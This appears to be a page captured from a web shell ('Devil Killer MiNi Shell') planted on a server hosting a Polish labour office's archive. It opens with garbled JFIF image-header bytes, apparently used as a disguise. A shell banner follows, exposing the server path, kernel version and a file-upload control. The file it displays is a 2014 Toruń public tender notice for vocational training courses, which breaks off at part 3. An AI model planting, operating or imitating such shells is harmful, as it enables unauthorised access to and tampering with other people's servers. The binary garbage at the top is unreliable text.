JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140304/71442-N-2014.html

<p class="kh_header"><b>Toruń: SZKOLENIA ZAWODOWE</b><br>
<b>Numer ogłoszenia: 71442 - 2014; data zamieszczenia: 04.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy dla Miasta Torunia , ul. Mazowiecka 49A, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6580202, faks 56 6580201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SZKOLENIA ZAWODOWE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu kursów dla  osób bezrobotnych uczestniczących w projekcie -Jesteśmy aktywni - działamy  - współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz w ramach środków Funduszu Pracy.
1.Operator maszyn do robót ziemnych i drogowych - kl.III - 10 osób (1 grupa)
2.Kierowca-operator wózków jezdniowych wraz z bezpieczną wymiana butli gazowych i uprawnieniami elektrycznymi do 1 kV -18 osób (1 grupa),
3.Kierowca-operator wózków jezdniowych wraz z bezpieczną wymianą butli gazowych	30 osób (2 kursy 15-osobowe),
4.Monter instalacji wod-kan-gaz. i c.o. z uprawnieniami spawalniczymi (metoda MAG) - 10 osób (1 grupa),
5.Pracownik techniczno-magazynowy z uprawnieniami na wózki jezdniowe i uprawnieniami elektrycznymi do 1 kV - 15 osób (1 grupa),
6.Fakturzysta z obsługą kas fiskalnych i komputerowych programów sprzedaży -	15 osób (1 grupa),
7.Kadry i płace z obsługą programu PŁATNIK i SYMFONIA -15 osób (1 grupa),
8.Pracownik budowlano-drogowy - 8 osób (1 grupa),
9.ABC Biznesu -130 osób (8-11 grup)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W zakresie części:
3.Kierowca-operator wózków jezdniowych wraz z bezpieczną wymianą butli gazowych	 - nie więcej niż 50% wartości tej części zamówienia,
9.ABC Biznesu - nie więcej niż 50% wartości tej części zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:
- jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013 r., poz. 674 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych na 2014 rok.
Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa będzie figurowała w Rejestrze Instytucji Szkoleniowych jako instytucja aktywna w roku 2014,
- spełnia wymagania do prowadzenia działalności szkoleniowej określone w §25 Rozporządzenia Ministra Gospodarki z 20.09.2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001 r. Nr 118 poz.1263) - dotyczy części 1 i 8 zamówienia.
Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa posiada dokument wystawiony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie, potwierdzający spełnienie wymagań do prowadzenia przedmiotowego szkolenia.
- spełnia wymagania do prowadzenia szkoleń i egzaminów spawaczy w metodzie MAG-135 - dotyczy części 4 zamówienia.
Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa posiada ważny co najmniej na okres trwania szkolenia atest/certyfikat na prowadzenie szkoleń i egzaminów spawaczy w metodzie MAG-135 uzyskany na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał:
a)  w części 1 zamówienia: 
     -  co najmniej jeden kurs operatora koparko-ładowarek dla minimum 10 osób.

b) w części 2 zamówienia:
     - co najmniej 1 kurs w zakresie kierowcy-operatora wózków jezdniowych dla minimum 15 osób każdy z liczba godzin zajęć co najmniej 67 oraz
     - co najmniej 1 kurs w zakresie uprawnień elektroenergetycznych dla minimum 10 osób z liczbą godzin zajęć co najmniej 40,

c) w części 3 zamówienia:
     -   co najmniej 2 kursy w zakresie kierowcy-operatora wózków jezdniowych dla minimum 15 osób każdy z liczba godzin zajęć co najmniej 67.

d) w części 4 zamówienia:
     -   co najmniej 1 kurs w zakresie spawania metodą MAG dla minimum 10 osób z liczba godzin zajęć co najmniej 140.

e) w części 5 zamówienia:
     -  co najmniej jeden kurs magazyniera lub pracownika magazynowego dla minimum 15 osób z liczbą godzin zajęć minimum 50, oraz
     -  co najmniej jeden kurs kierowcy-operatora wózków jezdniowych dla minimum 15 osób z liczbą godzin zajęć minimum 67,
     -  co najmniej 1 kurs w zakresie uprawnień elektroenergetycznych dla minimum 15 osób z liczbą godzin zajęć co najmniej 40,

W przypadku realizacji szkolenia dla minimum 15 osób obejmującego łącznie zagadnienia magazynowe i moduł kierowcy-operatora wózków jezdniowych kurs musi obejmować minimum 120 godz. zajęć. W przypadku realizacji szkolenia dla minimum 15 osób obejmującego łącznie zagadnienia kierowcy-operatora wózków jezdniowych oraz uprawnień elektrycznych kurs musi obejmować minimum 107 godz. zajęć.

f) w części 6 zamówienia:
     -   co najmniej jeden kurs z zakresu sprzedaży, fakturowania, obsługi kas fiskalnych dla minimum 10 osób z liczbą godzin zajęć min.100.

g) w części 7 zamówienia:
     -   co najmniej jeden kurs z zakresu kadr i płac dla minimum 15 osób z liczbą godzin zajęć min.150.

h) w części 8 zamówienia:
     -   co najmniej jeden kurs z zakresu montażu rusztowań budowlanych dla min.5 osób.

i) w części 9 zamówienia:
     - co najmniej  10 kursów z zakresu  przedsiębiorczości dla minimum 10 osób każdy z liczbą 
godzin zajęć minimum 60.

UWAGA:
W przypadku szkoleń o szerszej tematyce, ale obejmujących swym zakresem tematycznym zagadnienia związane z przedmiotem niniejszego zamówienia, w odpowiednich kolumnach - Wykazu wykonanych usług szkoleniowych - należy podać nazwę bloku, modułu lub części szkolenia o podobnej tematyce odpowiadającej niniejszemu zamówieniu i liczbę godzin jaka była przeznaczona na tę tematykę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował:
a)	potencjałem technicznym:
- pomieszczenia umożliwiające realizację zajęć teoretycznych dostosowane do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia - w szczególności co najmniej 1 sala szkoleniowa (w części 9 zamówienia z uwagi na możliwość jednoczesnego realizowania 2 kursów - co najmniej 2 sale szkoleniowe) dostosowana do ilości osób szkolonych z odpowiednią ilością miejsc i stolików, oświetleniem, ogrzewaniem i wentylacją. Pomieszczenia muszą być zgodne z rozporządzeniem MPiPS z 26.09.1997 w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. z 2003, Nr 169, poz.1650 ze zm.), rozporządzeniem Ministra Edukacji Narodowej i Sportu z 31.12.2002 w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach (Dz.U.z 2003, Nr 6, poz.69 ze zm.), rozporządzeniem Ministra Infrastruktury z 12.04.2002 w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowania (Dz.U. z 2002, Nr.75, poz.690 ze.zm.), rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 7.06.2010 w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz.U. z 2010, Nr 109, poz.719).
- wyposażenie dydaktyczne i urządzenia techniczne umożliwiające realizację zajęć teoretycznych danego szkolenia tzn. flipchart lub tablica magnetyczna (klasyczna), rzutnik multimedialny,
- pomieszczenia lub plac, które umożliwią realizację zajęć praktycznych danego szkolenia dostosowane do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia,
- wyposażenie, maszyny lub urządzenia techniczne umożliwiające realizację zajęć praktycznych danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków  pracy przy ich eksploatacji (w części 1 zamówienia -  2 koparko-ładowarki,  ładowarka jednonaczyniowa, koparka jednonaczyniowa, walec drogowy; w części 2 i 3 - co najmniej 3 wózki jezdniowe - różne typy; w części 5 - co najmniej 3 wózki jezdniowe - różne typy, 15 stanowisk komputerowych, 15 kas fiskalnych; w części 6 - 15 stanowisk komputerowych, 15 kas fiskalnych, terminal kart płatniczych, czytnik kodów kreskowych; w części 7 i 9 -  15 stanowisk komputerowych).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował osobami o wykształceniu, kwalifikacjach i doświadczeniu niezbędnym do realizacji poszczególnej części zamówienia:
- w części 1-5, 7-9 zamówienia - co najmniej 3 wykładowcami/trenerami/instruktorami. Każdy z wykładowców musi posiadać doświadczenie zawodowe w postaci przeprowadzonych w okresie od 1.01.2012 co najmniej 3 zajęć z bloku tematycznego, który będzie realizować na kursie,
- w części 6 zamówienia - co najmniej 2 wykładowcami/trenerami/instruktorami, z których każdy musi posiadać doświadczenie zawodowe w postaci przeprowadzonych w okresie od 1.01.2012 co najmniej 3 zajęć z bloku tematycznego, który będzie realizować na kursie, oraz 1 osobą, która ukończyła  szkolenie dla liderów klubów pracy i posiada uprawnienia do prowadzenia zajęć w zakresie aktywnego poszukiwania pracy w oparciu o rekomendowany przez MPiPS program szkolenia - Szukam Pracy. Osoba ta musi posiadać doświadczenie w prowadzeniu zajęć z zakresu aktywnego poszukiwania pracy - co najmniej 3 zajęcia w okresie od 1.01.2012.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- certyfikaty jakości usług  (o ile Wykonawca je posiada) wydane przez instytucje do tego  uprawnione  (przy ocenie brany jest pod uwagę certyfikat systemu zarządzania jakością ISO,  akredytacja właściwego kuratora oświaty),
- Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik,
- Pełnomocnictwo, w przypadku podmiotów występujących wspólnie, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (jeśli dotyczy),
- Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w pkt VI SIWZ polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt.VII.2 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiany terminu realizacji szkolenia - na wniosek Zamawiającego w przypadku nieskompletowania w terminie grupy szkoleniowej lub na wniosek Wykonawcy z powodu zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy (np. choroba wykładowcy),  
2)	zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy (np. choroba, śmierć itp.).  W przypadku zmiany wykładowcy wykonawca zobowiązany jest zapewnić, aby nowy wykładowca posiadał co najmniej kwalifikacje, wykształcenie i doświadczenie osoby, która została wykazana w wykazie kadry dydaktycznej (zał. nr 5 do SIWZ), na podstawie którego dokonano wyboru wykonawcy,
3)	zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
4)	zmiany harmonogramu zajęć i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy.
5)	w części 9 zamówienia - zmiany o 1 w ilości planowanych grup szkoleniowych oraz zmiany w liczebności osób w grupie szkoleniowej - przy zachowaniu ceny przeszkolenia 1 osoby, na wniosek Zamawiającego podyktowany terminami rekrutacji i przyznawania dotacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy dla Miasta Torunia
87-100 Toruń, ul. Mazowiecka 49A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 08:00, miejsce: Powiatowy Urząd Pracy dla Miasta Torunia
87-100 Toruń, ul. Mazowiecka 49A
kancelaria, pok.42.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt - Jesteśmy aktywni - działamy - współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Operator maszyn do robót ziemnych i drogowych - kl.III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: uzyskanie uprawnień operatora maszyn kl.III w zakresie dwóch specjalności: koparko-ładowarki oraz do wyboru przez uczestników kursu: koparki jednonaczyniowe, ładowarki jednonaczyniowe, walce drogowe.
2.Ilość godzin zajęć dydaktycznych: 336, w tym: 168 godz. teorii, 116 godzin zajęć praktycznych oraz 52 godz. dodatkowego szkolenia praktycznego dla osób nie posiadających miesięcznego stażu przy eksploatacji techniczno-eksploatacyjnej maszyn określonej specjalności. 
3.Zajęcia praktyczne powinny być przeprowadzone w podgrupach maksymalnie 5-osobowych.
4.Liczba osób do przeszkolenia:  10 (maksymalna - 10, minimalna - 8 osób). Kandydaci będą posiadać orzeczenie lekarskie o braku przeciwwskazań do pracy w zakresie przedmiotu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Doświadczenie wykonawcy - 20</li>
<li>3. Posiadanie certyfikatów jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kierowca-operator wózków jezdniowych wraz z bezpieczną wymiana butli gazowych i uprawnieniami elektrycznymi do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cel szkolenia: uzyskanie uprawnień do kierowania wózkami jezdniowymi wraz z bezpieczną wymianą butli gazowych oraz uprawnień elektrycznych w zakresie eksploatacji do 1 kV. Uprawnienia  do kierowania wózkami jezdniowymi muszą być uprawnieniami obowiązującymi na terenie każdego zakładu pracy.
2.Ilość godzin zajęć dydaktycznych: 127.
3.Wymagany zakres tematyczny szkolenia:
- obsługa  wózków jezdniowych z bezpieczną wymianą butli gazowych - 82 godz., w tym 30 godz. zajęć praktycznych w zakresie kierowania wózkami jezdniowymi.
- eksploatacja urządzeń elektrycznych - 45 godz.
4.Zajęcia praktyczne w zakresie obsługi wózków jezdniowych muszą być przeprowadzone w grupach maksymalnie 3-osobowych. 
5.Liczba uczestników: maksymalnie - 18, minimalnie - 15 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kierowca-operator wózków jezdniowych wraz z bezpieczną wymianą butli gazowych.</p>
